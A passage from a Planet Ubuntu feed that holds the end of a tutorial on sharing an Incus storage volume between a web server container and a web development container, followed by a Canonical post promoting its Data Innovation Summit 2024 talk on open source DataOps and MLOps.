<p>The fourth column is the <strong><em>content-type</em></strong> of a storage volume, and this can be either <code>filesystem</code> or <code>block</code>. The default when creating storage volumes is <code>filesystem</code> and we will be creating <code>filesystem</code> in a bit. </p>
<h3 class="wp-block-heading" id="creating-the-webdata1-storage-volume">Creating the <code>webdata1</code> storage volume</h3>
<p>Now we are ready to create the <code>webdata1</code> storage volume. In the functionality of the <code>incus storage volume</code>, we use the <code>create</code> command to create on the <code>default</code> storage pool the <code>webdata1</code> storage volume, which is of type <code>filesystem</code>.</p>
<pre class="wp-block-code"><code>$ <kbd>incus storage volume create default webdata1 --type=filesystem</kbd>
Storage volume webdata1 created
$ </code></pre>
<h3 class="wp-block-heading" id="attaching-the-webdata1storage-volume-to-the-web-server-container">Attaching the <code>webdata1</code>storage volume to the web server container</h3>
<p>Now we can attach the <code>webdata</code> storage volume to the <code>webserver1</code> container. In the functionality of the <code>incus storage volume</code>, we use the <code>attach</code> command to <code>attach</code> from the <code>default</code> storage pool the <code>webdata1</code> storage volume to the <code>webserver1</code> container, and mount it over the <code>/var/www/html/</code> path.</p>
<pre class="wp-block-code"><code>$ <kbd>incus storage volume attach default webdata1 webserver1 /var/www/html/</kbd>
$ </code></pre>
<h3 class="wp-block-heading" id="attaching-the-webdata1storage-volume-to-the-webdev-container">Attaching the <code>webdata1</code>storage volume to the webdev container</h3>
<p>Now we can attach the <code>webdata</code> storage volume to the <code>webdev</code> container. In the functionality of the <code>incus storage volume</code>, we use the <code>attach</code> command to <code>attach</code> from the <code>default</code> storage pool the <code>webdata1</code> storage volume to the <code>webdev</code> container, and mount it over the <code>/home/debian/WEBDEV/</code> path.</p>
<pre class="wp-block-code"><code>$ <kbd>incus storage volume attach default webdata1 webdev /home/debian/WEBDEV/webserver1</kbd>
$ </code></pre>
<h3 class="wp-block-heading" id="preparing-the-storage-volume-for-webserver1">Preparing the storage volume for <code>webserver1</code></h3>
<p>We have attached the storage volume into both the web server container and the web development container. Let’s setup the initial permissions and setup some simple hello world HTML file. We get a shell into the web development container <code>webdev</code>, and observe that the storage volume has been mounted. The default permissions are <code>drwxr-xr-x</code> and we replace them into <code>drwxr-xr-x</code>. That is, we can list the contents of the directory. Then, we changed the owner:group into <code>debian:debian</code>in order to allow all access to the Web developer when they edit the files.</p>
<pre class="wp-block-code"><code>$ <kbd>incus exec webdev -- su --login debian</kbd>
debian@webdev:~$ <kbd>ls -l</kbd>
total 1
drwxr-xr-x 3 debian debian 3 Mar 14 10:33 WEBDEV
debian@webdev:~$ <kbd>cd WEBDEV/</kbd>
debian@webdev:~/WEBDEV$ <kbd>ls -l</kbd>
total 1
drwx--x--x 2 root root 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ <kbd>sudo chmod 755 webserver1/</kbd>
debian@webdev:~/WEBDEV$ <kbd>sudo chown debian:debian webserver1/</kbd>
debian@webdev:~/WEBDEV$ <kbd>ls -l</kbd>
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ </code></pre>
<h3 class="wp-block-heading" id="creating-an-initial-helloworld-html-file">Creating an initial HelloWorld HTML file</h3>
<p>Still in the <code>webdev</code> container, we create an initial HTML file. Note that once you paste the HTML code, you press Ctrl+d to save the <code>index.html</code> file.</p>
<pre class="wp-block-code"><code>debian@webdev:~/WEBDEV$ <kbd>cd webserver1</kbd>
debian@webdev:~/WEBDEV/webserver1$ <kbd>cat > index.html</kbd>
<kbd><!DOCTYPE HTML>
<html>
<head>
<title>Welcome to Incus</title>
<meta charset="utf-8" />
</head>
<style>
body {
background: rgb(2,0,36);
background: linear-gradient(90deg, rgba(2,0,36,1) 0%, rgba(9,9,121,1) 35%, rgba(0,212,255,1) 100%);
}
h1,p {
color: white;
text-align: center;
}
</style>
<body>
<h1>Welcome to Incus</h1>
<p>The web development data of this web server are stored in an Incus storage volume. </p>
<p>This storage volume is attached to both the web server container and a web development container. </p>
</body>
</html></kbd>
Ctrl+d
debian@webdev:~/WEBDEV/webserver1$ <kbd>ls -l</kbd>
total 1
-rw-r--r-- 1 debian debian 608 Mar 14 11:05 index.html
debian@webdev:~/WEBDEV/webserver1$ <kbd>logout</kbd>
$ </code></pre>
<h3 class="wp-block-heading" id="testing-the-result">Testing the result</h3>
<p>We visit the web server using our browser. The IP address of the web server is obtained as follows.</p>
<pre class="wp-block-code"><code>$ <kbd>incus list webserver1 -c n4</kbd>
+------------+--------------------+
| NAME | IPV4 |
+------------+--------------------+
| webserver1 | 10.10.10.88 (eth0) |
+------------+--------------------+
$ </code></pre>
<p>This is the HTML page we created. </p>
<figure class="wp-block-image size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-2024-03-14-at-13-09-13-Welcome-to-Incus.png?ssl=1"><img alt="" class="wp-image-46543" height="247" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-2024-03-14-at-13-09-13-Welcome-to-Incus.png?resize=750%2C247&ssl=1" width="750" /></a></figure>
<h2 class="wp-block-heading" id="conclusion">Conclusion</h2>
<p>We showed how to use a storage volume to separate the web server data files from the web server container. Those files are stored in the Incus storage pool. We attached the same storage volume to a separate container for the Web developer so that they get access to the files and only the files from a central location, the <code>webdev</code> container. </p>
<p>An additional task would be to setup <code>git</code> in the <code>webdev</code> container so that any changes to the web files are tracked. </p>
<p>You can also <code>detach</code> storage volumes (no shown here).</p>
<p>You would use <code>incus config device</code> to create a proxy device to give external access to the Web developer. Preferably over SSH/SFTP, instead of just plain FTP. In fact in terms of usability it does not make a difference between the two. Yeah, please use SFTP. All web development tools should support SFTP.</p>
<p></p>
<div class="saboxplugin-wrap"><div class="saboxplugin-tab"><div class="saboxplugin-gravatar"><img alt="Simos Xenitellis" class="avatar avatar-100 photo" height="100" src="https://secure.gravatar.com/avatar/5c04c6b5f513d926ea9d77782a3843a1?s=100&d=wavatar&r=g" width="100" /></div><div class="saboxplugin-authorname"><a class="vcard author" href="https://blog.simos.info/author/simos/" rel="author"><span class="fn">Simos Xenitellis</span></a></div><div class="saboxplugin-desc"><div></div></div><div class="saboxplugin-web "><a href="https://blog.simos.info/" target="_self">blog.simos.info/</a></div><div class="clearfix"></div></div></div>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Join the Canonical Data and AI team at Data Innovation Summit 2024https://ubuntu.com//blog/join-canonical-data-and-ai-team-at-data-innovation-summit-20242024-03-14T08:00:09+00:00<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="1440" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_2560,h_1440/https://ubuntu.com/wp-content/uploads/5daf/data-innovation-summit-1.jpg" width="2560" />
</noscript>
</div>
</figure>
<p>Canonical is delighted to be a technology partner at the <a href="https://datainnovationsummit.com/">Data Innovation Summit (DIS)</a> in 2024. We are proud to showcase our Data and AI solutions through our conference talk and technology in practice sessions. The event will take place in Kistamässan, Stockholm on April 24-25, 2024. Visit us at <strong>booth C71</strong> to learn how open source data and AI solutions can help you take your models to production, from edge to cloud.</p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/victoria-antipova/canonical-at-data-innovation-summit?month=2024-04" rel="noreferrer noopener" target="_blank">Book a meeting with us</a></p>
<h2 class="wp-block-heading">Data and AI: get first-hand insights from Canonical experts</h2>
<p>The modern enterprise can use AI algorithms and models to learn from their treasure troves of big data, and make predictions or decisions based on the data without being explicitly programmed to do so. What’s more, the AI models grow more accurate over time. </p>
<p>The magic is in the melding of AI and big data. Data of incredible volume, velocity, and variety is fed into the AI engine, making the AI smarter. Over time, less human intervention is needed for the AI to run properly; in time, the AI can deliver deeper insights—and strategic value—from the ever-increasing pools of data, often in real time. </p>
<p>In today’s competitive business environment, your AI and data strategies need to be more interconnected than ever. According to an MIT Technology Review survey, 78% of CIOs say that scaling AI to create business value is the top priority of their enterprise data strategy, and 96% of AI leaders agree. Nearly three out of four CIOs also say that data challenges are the biggest factor jeopardising AI success.</p>
<p>The Data Innovation Summit is a significant event in the field of Data and AI, especially in the Nordics. It brings together professionals, enterprise practitioners, technology providers, start-up innovators, and academics working with data and AI. We at Canonical are delighted to announce that we will be participating in this event and sharing our expertise in Data and AI.</p>
<p>Canonical is a well-known publisher of Ubuntu, which is the preferred operating system (OS) for data scientists. In addition to the OS, Canonical offers an integrated data and AI stack. We provide the most cost-effective options to help you gain control over your Total Cost of Ownership (TCO), and ensure reliable security maintenance, allowing you to innovate at a faster pace.<br /></p>
<h2 class="wp-block-heading">Canonical DIS talk: open source DataOps and MLOps</h2>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/rNlCdVhNBJWwc97bY6gr0qc04QJcdZtFGYsEK6VmC3O63E4Qx_VIP2L0C_YMaeXQLqbAR6VG8TnSZORC1tz24iMcIiWH2ZzB-hpRSdlAAM22zosba-cmn0OHcXzJqObztGMGMQPQ6VdPKwfezB6zjD0" width="720" />
</noscript>
</div>
</figure>
<p>Canonical data and AI Product Managers, and <a href="https://ubuntu.com/blog/author/munteanuandreea">Andreea Munteanu</a> and <a href="https://ubuntu.com/blog/author/mtabirao">Michelle Anne Tabirao</a> will be speaking about open source for your DataOps and MLOps.</p>
<p><em><strong>Talk description</strong></em></p>
<p>Open source data and AI tools enable organisations to create a comprehensive solution that covers all stages of the data and machine learning lifecycle. This includes correlating data from various sources, regardless of their collection engine, and serving the model in production. Together, DataOps and MLOps drive the collaboration, communication, and integration that great data and AI teams need, making them essential to the model lifecycle. DataOps is an approach to data management that focuses on collaboration, communication, and integration among data engineers, data scientists, and other data-related roles to improve the efficiency and effectiveness of data processes. MLOps is a set of practices that combines machine learning, software development, and operations to enable the deployment, monitoring, and maintenance of machine learning models in production environments.</p>
<p>In this talk, we will explore how to build an end-to-end solution for DataOps and MLOps using open-source solutions like databases, ML and analytics tools such as OpenSearch, Kubeflow, and MLFlow. Professionals can focus on building ML models without spending time on the tooling operational work. We will highlight some use cases, e.g. in the telco sector, where they use MLOps and DataOPs to optimise the telco network infrastructure and reduce power consumption.</p>
<p>Attendees will learn about the critical factors to consider when selecting tools and best practices needed for building a robust, production-grade ML project.</p>
<h2 class="wp-block-heading">Come and meet us at DIS 2024</h2>
<p>If you are interested in building or scaling your data and AI projects with open source solutions, we are here to help you. Visit our <a href="https://canonical.com/data">Data</a> and <a href="https://ubuntu.com/ai">AI offerings</a> to explore our solutions.</p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/victoria-antipova/canonical-at-data-innovation-summit?month=2024-04" rel="noreferrer noopener" target="_blank">Book a meeting with us</a></p>
<h2 class="wp-block-heading has-black-color has-text-color has-link-color wp-elements-c2a2bcc8152d07708b268ae24c209719">Learn more about our Data and AI solutions</h2>
<ul>
<li><a href="https://open.spotify.com/show/0vXcVgTHKUeJZx5YYYgdiX">Ubuntu AI podcast</a>: dive into data and AI on the go</li>
<li><a href="https://ubuntu.com/engage/open-source-big-data-ai">Big data and AI WP</a>: build a smarter enterprise with a secure, integrated open source stack</li>
<li><a href="https://ubuntu.com/engage/mongodb-enterprise-data-management">MongoDB for enterprise data management WP</a>: MongoDB benefits for modern enterprise data management, use cases for financial, telecommunications and automotive industries</li>
<li><a href="https://pages.ubuntu.com/rs/066-EOV-335/images/Canonical_MLOps_Toolkit.pdf?version=0">MLOps toolkit</a>: from hardware to applications, discover the key factors to consider when building your machine learning toolkit</li>
<li><a href="https://ubuntu.com/engage/postgres-ai-applications">Using PostgreSQL to power your AI applications</a>: learn what PostgreSQL has to offer for your AI projects</li>
<li><a href="https://canonical.com/data">Canonical Data</a>: enterprise data solutions for rapid innovation at any scale</li>
<li><a href="https://ubuntu.com/ai">Canonical AI</a>: take your models to production with open source AI</li>
</ul>Ubuntu developershttp://planet.ubuntu.com/